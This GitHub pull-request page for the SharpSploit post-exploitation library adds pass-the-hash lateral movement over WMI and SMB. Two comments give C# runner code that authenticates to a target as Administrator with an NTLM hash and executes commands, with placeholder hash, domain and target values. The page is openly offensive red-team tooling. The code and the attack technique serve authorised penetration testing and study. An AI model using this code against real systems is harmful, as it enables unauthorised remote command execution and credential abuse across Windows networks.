search

cobbr / SharpSploit

SharpSploit is a .NET post-exploitation library written in C#
https://sharpsploit.cobbr.io/api/
BSD 3-Clause "New" or "Revised" License
1.75k stars 307 forks source link

Merge pth into master #44

Open checkymander opened 4 years ago

checkymander commented 4 years ago

Added pass the hash functionality into SharpSploit, WMIExecute and SMBExecute based on the Invoke-TheHash codebase. Code can be tested with the following runner:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(PassTheHash.WMIExecute("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

The library supports both Admin Check functionality, and command execution with support for WMI, SMB1, and SMB2 (including signing).

checkymander commented 4 years ago 
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(WMI.WMIExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

Updated example code to reference the new function names

edermi commented 3 years ago

Any chance to get this merged into master? Would love to see this in Covenant in the long run